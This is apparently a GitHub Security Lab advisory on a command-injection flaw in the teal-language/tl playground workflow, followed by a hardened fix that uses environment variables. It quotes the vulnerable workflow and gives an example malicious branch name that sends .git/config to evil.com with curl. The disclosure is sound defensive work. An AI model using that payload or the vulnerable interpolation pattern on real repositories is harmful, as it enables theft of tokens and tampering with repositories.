The playground GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration from a Pull Request.
teal-language/tl repository
The latest changeset of playground.yml as of the report date:
on:
  pull_request_target:
    branches: [ master ]
...
      - name: build
        run: |
          echo "${{ github.event.pull_request.head.repo.full_name }}/${{ github.head_ref }}"
          cd ${{ github.workspace }}/teal-playground
          yarn build
The workflow runs on pull_request_target, so it executes in the context of the base repository with a read/write GITHUB_TOKEN and access to the repository secrets. The branch name of the pull request (github.head_ref) is chosen by the PR author and is interpolated directly into the run script before the shell executes it, so any shell metacharacters in the branch name become part of the script. This allows arbitrary command injection into the bash script, which in turn allows unauthorized modification of the base repository and secrets exfiltration. For example, a PR from a branch named a";${IFS}curl${IFS}-d${IFS}@.git/config${IFS}evil.com${IFS}#
would exfiltrate the repository token to the attacker-controlled server.
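The standard mitigation is to stop interpolating untrusted expressions into the script text and instead pass them to the step through env:, so the shell receives the value as data in an environment variable rather than as code. The fragment below is an added, hardened version of the vulnerable step written for this advisory; it is not the teal-language/tl project's own fix, and the permissions block assumes the build step needs no write access to the repository.

```yaml
on:
  pull_request_target:
    branches: [ master ]

# Assumption: the build only needs to read the repository. Dropping write
# access limits what a compromised step could do with GITHUB_TOKEN.
permissions:
  contents: read

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # Untrusted, PR-author-controlled values are bound to environment
      # variables here. The expression is evaluated by the runner and the
      # result is stored in the variable; it is never spliced into the script.
      - name: build
        env:
          HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
          HEAD_REF: ${{ github.head_ref }}
        run: |
          # Double-quoted variable expansion keeps the value as a single word,
          # so a branch name containing ";", "$" or whitespace cannot start a
          # new command.
          echo "$HEAD_REPO/$HEAD_REF"
          cd "$GITHUB_WORKSPACE/teal-playground"
          yarn build
```

Where the job does not actually need the base repository's write token or secrets, switching the trigger from pull_request_target to pull_request removes the privileged context altogether, and the injection would then only affect a read-only job running on the fork's code.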
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2021-017 in any communication regarding this issue.